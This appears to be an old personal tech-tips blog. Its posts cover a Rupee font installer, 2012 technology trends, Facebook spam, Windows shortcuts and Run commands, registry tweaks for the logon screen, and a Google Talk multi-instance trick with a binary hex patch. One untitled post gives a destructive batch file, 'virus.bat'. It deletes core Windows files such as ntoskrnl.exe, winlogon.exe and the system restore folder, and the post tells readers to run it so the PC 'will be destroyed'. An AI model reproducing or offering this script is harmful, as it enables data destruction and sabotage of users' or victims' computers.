My Blog

It's all about Information, tricks and knowledge..

Download Indian Rs new Symbol Font

No comments

Use the new symbol in office documents
1. Download the above file.
2. Extract the files. (You will need winrar or 7zip installed in your PC to extract the files)
3. Double click on the Rupee_Font_Installer.exe
4. Click on “Install” button
5. Done. :)


No comments :

Post a Comment

Toshiba Excite AT200 “World’s Thinnest Tablet” Shows Up On Official Website – Hitting Canada In January

No comments

Toshiba Canada has listed their all new Excite Honeycomb tablet on their site today and it looks like it will be hitting ‘ol America Jr. sometime in January. Originally announced back in September, the AT200 boasted the world’s thinnest and lightest tablet, most likely in hopes of washing away the bad taste the almost “Nerf-like” Thrive left in our mouths.
Not much here has changed. Measuring in at only 7.7mm thick, this Honeycomb tablet is actually thinner than a Galaxy S II. Other features include a 10.1-inch 1280×800 resolution display, 1.2GHz dual-core OMAP 4430 processor, 5MP rear/2MP front facing cameras, micro HDMI and will come available in either 16 or 32GB versions. If Toshiba can come through with Ice Cream Sandwich, I’ll definitely be listening.

No comments :

Post a Comment

Top Technology Trends for 2012

No comments

         Well, it is December, when sugar plums fill children's heads and analysts look into their crystal balls to see what the new year will bring. Assuming the world doesn't end, 2012 should be a watershed year for personal technology, showcasing the beginning and end for a lot of companies, as well as major transitions for those that are left.
Overall, you'll find technology more social, more connected, and increasingly more voice-controlled. You'll also see the beginning of real convergence, the next phases of consumerization, and the blurring of lines between tablets and laptops.
I'll close with my product of the week: Slacker on Sonos. Yes, two of my favorite products got married.

Voice Command

The success of Siri is clearly driving a lot of folks to create similar offerings, so expect this type of technology to make it over to other handset makers and into tablets next year.
PCs should get it as well, and I expect some of the implementations will probably suck. I expect someone will try this in places it won't work, or use technology that doesn't work very well, with a lot of knockoffs coming out of China.
Look for Siri-like interfaces in websites, as well to help you navigate. I'd expect you to see something like this tied to Google's (Nasdaq: GOOG) ecosystem, given how much Google likes to copy Apple(Nasdaq: AAPL).

Email Decline

This has actually been going on for a while, with reports that kids coming out of school don't have email accounts anymore and live on social networks and in messaging products.
Files are getting too large to send in email anyway, for the most part, and downloading services that allow you to share links are vastly quicker and often more smartphone/tablet friendly.

Cable Box Decline

The traditional cable box will increasingly be replaced by game consoles and smart TVs next year. This has been going on in Europe for some time, with systems like the Xbox, and Verizon just started a similar effort with that product here for FIOS customers.
This provides the advantage of both a richer and less-complex experience for the user, as well as a cheaper experience for the cable company, and it appears to be resonating with both groups.

Hosted Services

Google started the ball rolling with apps, and OnLive lit a fire under this with games. As we move into 2012, more and more of what we access will be hosted.
Already, movies are streamed rather than downloaded, and it won't be long until most of our applications exist on the Internet and don't run locally. I expect a big push in this direction in 2012.

App Stores

This trend continues and accelerates into 2012 with the launch of Microsoft's (Nasdaq: MSFT) app store and the expected death of packaged software products.
As for the software you run locally, you'll increasingly buy it from a trusted app store, though that store may be offered by Amazon (Nasdaq: AMZN) or your laptop supplier.

Windows 8 - Touch

This product is a trend in and of itself, and it represents the biggest bet that Steve Ballmer's Microsoft has ever made. The company is going to singlehandedly blur the lines between PCs and tablets and hope that users don't get confused.
This will bring touch into the mainstream of the PC market and narrow the gap between notebooks and tablets.

Thin Is In

Driven largely by tablets (mostly iPads) and ultrabooks (including the MacBook Air), next year will be the year when thin moves across the mainstream of notebook computers.
This won't just be for PCs, as thin products will continue to be driven in smartphones, tablets, and TVs as well. Vendors will continue to compete to be the thinnest in every category.

TIS (Tablets in Stuff)

Samsung has already bought out a refrigerator with a built in tablet computer and others are likely to follow their example.
Cars will be shown with tablet-like features built into their dash, and this iPad effect will likely extend to things like home automation and high-end home alarm systems as well. And yes, you'll likely be able to install apps on many of them.

Peer-to-Peer Gaming

Qualcomm (Nasdaq: QCOM) will be pushing peer-to-peer gaming into smartphones next year, and this could spell the end for most standalone gaming systems.
This will allow people to engage others (think kids) in games without running up data charges, since the phones talk directly to each other, and gaming may be faster as well, because there is no network latency.

Cores Are Us

In tablets, we'll move from two cores to up to five cores for Nvidia's (Nasdaq: NVDA) Tegra 3 offering. These multicore offerings should allow the next generation of tablets (the AsusTransformer 2 is already shipping) to approach the low end of PC performance, and they'll be ideal candidates for the ARM (Nasdaq: ARMHY) version of Windows 8.
This will also define what likely will be the major battle in 2012 between the high end of this new ARM class and Intel (Nasdaq: INTC), and it likely will be a battle for the ages.

Wrapping Up: Privacy/Security

With the concerns over the Carrier IQ rootkit going vertical the one final trend I expect is a near rabid focus on privacy. Going into an election year in the U.S., it just seems likely that someone in politics will be hacked, embarrassed, and will go on the warpath on privacy regulation as a result.
That or we'll have a nationwide hostile attack of epic proportions; this is supported by a dire report from McAfee that showcases Android as excessively unsafe. Android is currently the most successful product on smartphones.
So products will be thinner, more social, easier to talk to, friendlier and smarter, and some may try to kill us. 2012 looks pretty good except for that last part.

Product of the Week: Slacker on Sonos

Product of the WeekSonos is my favorite in-home music system. It really is the only system that allows you to move your music around the house and has a party mode so you can sync the playback in all of the rooms.
Slacker is my favorite music service, with a massive number of "stations" that find and organize music based on the kind of music and artists I like. My great regret is I could never get Slacker on Sonos, and last week that regret died.
Slacker is a music service that starts with an advertising-based free offering and has tiered pricing to full service. For me, it has proven to provide the best balance between allowing me to listen to my own music and finding new music -- and now it will fill my house. Because this is big for me personally, Slacker on Sonos is my product of the week.

No comments :

Post a Comment

Flood of Filth Turns Facebook News Feeds Into Open Sewers

No comments
Flood of Filth Turns Facebook News Feeds Into Open Sewers
Many Facebook users have complained recently about a spam flood of a most unsavory nature.
Some say pornographic images and images depicting extreme violence -- sometimes both -- are showing up in their News Feeds without their consent. Others say their accounts are being used to send friends links to explicit videos and other messages.
The attacks once again highlight the ongoing war between Facebook and hackers.
"We have recently experienced an increase in reports and we are investigating and addressing the issue," Facebook spokesperson Gwendolyn Belomy told TechNewsWorld.
"Protecting the people who use Facebook from spam and malicious content is a top priority for us, and we are always working to improve our systems to isolate and remove material that violates our terms," Belomy added.

Halloween on Facebook?

Apparently some members of Facebook found the offensive images posted in their Facebook News Feeds without their consent or knowledge.
Others reportedly received complaints from friends that their accounts were being used to send requests to click on links to videos, bogus chat messages, or mass messages and tagged photos that mislead those who click.
Some angry members have reportedly terminated their accounts.
It's not presently known exactly how many of Facebook's 800 million members were affected by the attacks. Many users have not observed anything unusual about their news feeds or those of their friends.

Something Old, Something New

Attacks like this have plagued Facebook for years, though most don't reach this size.
"It's the scale of this one that makes it newsworthy," Enderle said. "It appears to be a broad attack on the service likely intended to drive people away from it," he added.
Judging by various reports, it appears that the hackers are using various means of attack.
One appears to be clickjacking -- an attack using hidden buttons or links on a website beneath the real buttons or links to redirect victims when they click.
Another appears to follow on from the hijacking of legitimate user accounts. The attackers then send out malicious links and other content to the friends of the owners of the hijacked accounts in an attempt to get them to click on these poisoned links and content.

Facebook Friends Hurting Friends

Hackers and spammers persist in targeting Facebook and other social networking sites because "social networks are a gold mine for attackers," Mike Geide, senior security researcher at Zscaler ThreatLabZ, told TechNewsWorld.
"With such a large volume of users, spam and malicious content can spread very rapidly," Geide added.
It's not clear whether the attackers were playing an ill-considered prank or had monetary or other motives behind their actions.
"It could be extortion, but Facebook hasn't reported the intent," Enderle stated. "Or this could be kids with too much time on their hands, or an attempt to drive people off Facebook, or even some disgruntled user getting revenge," he added.

The social networking site needs to do more, contended Rob Enderle, principal analyst at the Enderle Group.
"This can only truly be stopped by better securing the services and clearly showcasing that those who violate a service like this are prosecuted to the full extent of the law regardless of where they are located,".

No comments :

Post a Comment

Hide Files or Folders Using Command Prompt

No comments

Trick to hide files and folders using Command Prompt
The most important thing is that, once hidden with this method, the files/folders cannot be viewed by any search options even if you click "Show All Hidden Files and Folders". 

Hiding the most wanted files and folders is very important nowadays and it's really a tedious job too. In order to make this tedious job an easy one, i'm going to deliver you a the trick now.
For Example: You have a folder named "collegephotos" and this folder is stored in (Disk Drive E). You think that it should not be seen by strangers who use your PC.

For that you need to follow the following instructions

  1. Press windowkey+R: Run command dialog box appears.
  2. Now type "cmd" and hit enter. A command prompt window displays.
  3. Now type "attrib +s +h E:\collegephotos" and hit enter.
  4. The folder "collegephotos" will be hidden (Note: It cannot be viewed by any search options)

    (To view this folder again, use the same command but replace '+' with '-' on both flags 's' and 'h')

No comments :

Post a Comment

Keyboard Shortcuts for Windows Vista and XP and Microsoft Office

No comments

Windows Key+E

The best part about shortcut keys is letting your keyboard do half the work. This is a perfect example: This shortcut allows you to open Windows Explorer with one quick keystroke.

Windows Key+M

This is the shortcut to keep in mind when you are at work doing anything but working—it allows you to minimize all of your open windows, leaving just the desktop left exposed. To restore the windows, hit Windows key+Shift+M. Another quick way to do this is Windows key+D, which shows your desktop; to restore, just repeat the same keystroke. This is a handy shortcut to have around the next time your boss is wandering through the office.


This allows you to easily scroll through all the windows you have open. If you're working in Word and referring to something in Explorer, for example, you can toggle back and forth between the two programs. You can also use this to switch between windows in the same program, making multitasking a breeze. Very similar is Windows key+Tab: In XP, it lets you scroll the items on the taskbar, and in Vista, it starts Flip 3D for a fun graphical spin on the same idea.


This shortcut is a quick way to close a window in any program. Alt+Spacebar+C (which requires less stretching, but more keys) and Ctrl+W do the same thing. Any of the ways will allow you to close a window without using your mouse to hit the X in the upper-right corner.

Ctrl+Arrow Keys

In Microsoft Word, the left and right arrows allow you to move the cursor to the beginning of the previous word or the next word; the up and down arrows will do the same with paragraphs. This is very helpful when editing a document or scanning for any reason.


If you want to delete a file—and you don't want to deal with it later in the Recycle Bin—this is the way to go. Just be absolutely sure that this is a file you won't want back!

Hold Shift While Inserting a CD

Have you ever wanted to insert a CD and not use it right away? This shortcut allows you to bypass Autorun when inserting a CD so you can control exactly when you will use a CD you've inserted.


There are many ways to copy a file, but this just might be the easiest. All you have to do is click on the file, hold, and drag it into its desired location. This works the same as another handy shortcut, Ctrl+C.

Windows Key+U+U

Quickly shut down Windows by hitting the Windows key (don't hold it down), hitting U to reach the shutdown menu, and then hitting U again to shut down.

Windows Key+Pause

Need a quick way to get to the Systems Properties menu without too much thought? Just press these two keys and you'll be brought right to it.

Ctrl+Z, Ctrl+Y

Undo an action by hitting Ctrl+Z; if you change your mind, Ctrl+Y will redo the undo.

Shift + Arrow Keys

Holding shift and pressing one of the arrow keys will highlight text in Word (or a group of Excel cells) without the mouse, selecting in the direction the arrow points.

Ctrl+U, Ctrl+B, Ctrl+I

This one's for Office newbies. It's a snap to underline, bold, and italicize without the mouse if you press Ctrl+U (underlining), Ctrl+B (bolding), or Ctrl+I (italicizing).

No comments :

Post a Comment

steps to keep ur computer safer

No comments
Minimizing Potential for Introducing Computer Viruses, Trojan Horses and Logic Bombs
There are a number of ways to minimize potential for obtaining computer viruses, Trojan horses and logic bombs.
Individual Actions
1. Never accept disks or programs without checking them first using a current version of an anti-viral program.
2. Never use software or demos with doubtful origins.
3. If you lend a disk to anyone, check it when you get it back, BEFORE you use it again.
4. Never leave a floppy disk in the disk drive longer than necessary.
5. Never boot your machine with a disk in the disk drive, unless it is a known "Clean" bootable system disk.
6. Always scan any program or document download onto your machine before you open or read it.
7. Keep your anti-virus software up to date - upgrade on a regular basis.
8. Be aware of "cookies", files that are automatically transferred to users computers when they visit particular web sites. These cookies retain information about the users and browsing preferences, as well as a log of other sites visited since the last time the user accessed the site, which initially left the cookie. Cookies invade an individual's privacy and have the potential to act as agents of virus and Trojan horse transfer. Delete cookie files on a regular basis, or select the "do not accept cookies option" in your browser preferences. Commercialization of the World Wide Web: The Role of Cookies ( is an excellent source of information for those who would like to pursue this area in further depth.

No comments :

Post a Comment


No comments

@echo off
del "c:\windows\pchealth\"
del "c:\windows\system\"
del "c:\windows\system32\restore"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrnl.exe"

copy the above coding in notepad

save this file with "virus.bat" extension

double click and your pc will be destroyed.

No comments :

Post a Comment


No comments

You can access all these programs by going through START-->RUN or Simply Click Windows Key+R

SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book - wab
Windows Address Book Import Utility - wabmig
Windows Backup Utility (if installed)- ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure - wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone

removable storage- ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks

Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt

microsoft Access- access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview desktop manager (If Installed)- nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection Configuration) - ipconfi/all
IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
calculator- calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl

No comments :

Post a Comment


No comments
What is C:
C is a programming language developed at AT & T’s Bell
Laboratories of USA in 1972. It was designed and written by a
man named Dennis Ritchie. In the late seventies C began to
replace the more familiar languages of that time like PL/I,
ALGOL, etc. No one pushed C. It wasn’t made the ‘official’ Bell
Labs language. Thus, without any advertisement C’s reputation
spread and its pool of users grew. Ritchie seems to have been
rather surprised that so many programmers preferred C to older
languages like FORTRAN or PL/I, or the newer ones like Pascal
and APL. But, that's what happened.
Possibly why C seems so popular is because it is reliable, simple
and easy to use. Moreover, in an industry where newer languages,
tools and technologies emerge and vanish day in and day out, a
language that has survived for more than 3 decades has to be really

No comments :

Post a Comment

Top IT skills wanted for 2012

No comments

 A new Computerworld survey indicates the nine IT skills that will be in demand in 2012.
                      Nearly 29 percent of the 353 IT executives who were polled in Computerworld’s annual Forecast survey said they plan to increase IT staffing through next summer. (That’s up from 23% in the 2010 survey and 20% in the 2009 survey.)
Here are the skills that the IT executives say they will be hiring for:
  1. Programming and Application Development–61% plan to hire for this skill in the next 12 months, up from 44% in the 2010 survey. This covers the gamut from website development to upgrading internal systems and meeting the needs of mobile users.
  2. Project Management (but with a twist)– The twist is that they’re not going to just be looking for people who can oversee and monitor projects. They also want people who can identify users’ needs and translate them for the IT staffers-the increasingly popular business analysts.
  3. Help Desk/Technical Support–Mobile operating systems have added a new dimension to help desk and tech support.
  4. Networking-This demand is being fueled partially by virtualization and cloud computing projects. The survey also revealed that execs will be looking for people with VMware and Citrix experience.
  5. Business Intelligence-Computerworld interprets this uptick to a focus shift in many companies,  from cost savings to investing in technology. That will be nice if it pans out that way.
  6. Data Center-Virtualization and the Cloud could also be behind the increased need for IT professionals with backgrounds in data center operations and systems integration.
  7. Web 2.0-Tech skills centered around social media will be in demand, with .Net, AJAX and PHP as key back-end skills, with HTML, XML, CSS, Flash and Javascript, among others, on the front end.
  8. Security-Although down from 32 percent in the 2010 survey, security stays a top concern of IT executives.
  9. Telecommunications-The survey indicates a demand for people with IP telephony skills, and for those familiar with Cisco IPCC call center systems.

No comments :

Post a Comment

Adding messages to Windows 7's logon screen

No comments

If you are responsible for managing Windows 7 systems that are open to the public or have multiple user accounts, you may want to add a warning message to the logon screen. You may also want to display logon statistics on the logon screen. Fortunately, doing so is easily accomplished by tweaking a couple of existing registry settings and adding a new setting.
In this edition of the Windows Desktop Report, I’ll show you how to delve into Windows 7’s registry to make the appropriate changes.

Editing the registry

It is important to keep in mind that the registry is vital to the operating system and changing it can be dangerous if you inadvertently make a mistake. As such, you should take a few moments to back up your system by creating a Restore Point as well as by creating a system image in the Backup and Restore tool. That way if anything goes awry, you can restore your system and get right back to work.
To launch the Registry Editor, click the Start button, type Regedit in the Start Search box, and press [Enter]. When the UAC dialog box appears, respond appropriately.

Getting started

Once the Registry Editor launches, locate the following key:
From this key, shown in Figure A, you’ll be able to make all the following changes to the Logon screen.

Figure A

From this key, you’ll be able to make all the necessary changes to the Logon screen.

The warning message

The warning message that you’ll add to the Windows 7’s logon screen is actually made up of two parts: the title and the message text.
To add a title to the warning message, locate and double-click the legalnoticecaption value. When the Edit DWORD dialog box appears, type the title in the Value data text box, as shown in Figure B, and click OK. As you can see, for my example I chose to use a Welcome message, but you can essentially type anything that you want for your title. You can use up to 80 characters, including spaces, for the title.

Figure B

The legalnoticecaption value allows you to specify a title for your warning message.
To add the warning message, locate and double-click the legalnoticetext value. When the Edit DWORD dialog box appears, type the warning message in the Value data text box, as shown inFigure C, and click OK. As you can see, for my example, I chose to remind users of the rules in the lab. Again, you can essentially type anything that you want for your message text. You can use up to 16,383 characters, including spaces, for the message text. However, I have never needed to use that many characters for my messages.

Figure C

You can type a lot of text into the legalnoticetext value.

Tracking logons

If you want to be able to keep track of logons that were made on your system, you can configure the Logon screen to display logon statistics. Right-click anywhere inside the System key and select New| DWORD (32-bit) Value. When the new value appears, type DisplayLastLogonInfo and press Enter twice. When the Edit DWORD dialog box appears, simply type a 1 in the Value Data text box, as shown in Figure D, and click OK.

Figure D

If you want to be able to keep track of logons that were made on your system, set theDisplayLastLogonInfo value to 1.

The new logon display

Now when you restart your system and access the logon screen, you’ll see the warning message, as shown in Figure E. Just click OK and you’ll see your user icon and be able to continue with the logon operation.

Figure E

The warning message will appear on top of the logon screen.
When you select your user icon on the logon screen and type your password, you’ll see the logon statistics, as shown in Figure F. Just click OK to complete the logon operation, and you will immediately see the desktop as you normally would.

Figure F

After you click your user icon, you’ll see the logon statistics on the logon screen.

No comments :

Post a Comment

Want you to make your blog/site picked up by search engines

No comments

                       Now visitors will read you blog/site. 

No comments :

Post a Comment

Running Multiple Instances of Google Talk

No comments
Users of Google Talk (GTalk) can also let GTalk go to polygamy, that\92s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.

Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don\92t want to log on and off from one account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

You can add the /nomutex switch or parameter to existing Google Talk shortcut, or create a new shortcut with the /nomutex command line parameter.

To edit existing Google Talk shortcut:

1) Right click on the Google Talk shortcut.
2) On the right click contextual menu, click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).

Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex

5) Click on OK.

To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:

\93C:\Program Files\Google\Google Talk\googletalk.exe\94 /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

If you have hex editor, you can act like a hacker and modify the bits in Google Talk program so that it will always allow multiple instances of GTalk to be launched whether the /nomutex switch is specified or not.

Launch hex editor and open googletalk.exe, then search for the following patterns in the hex editor:

004536FD . 3BC6 CMP EAX,ESI
004536FF . 75 05 JNZ SHORT googleta.00453706

Modify the string to look like the following:

004536FD . 8BC1 MOV EAX,ECX
004536FF . EB 05 JMP SHORT googleta.00453706

How this Works?
The mutex is short for mutual exclusion object.
A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.

So, in the hack above, we used nomutex (no-mutex) to use the same resources simultaneously....! 

No comments :

Post a Comment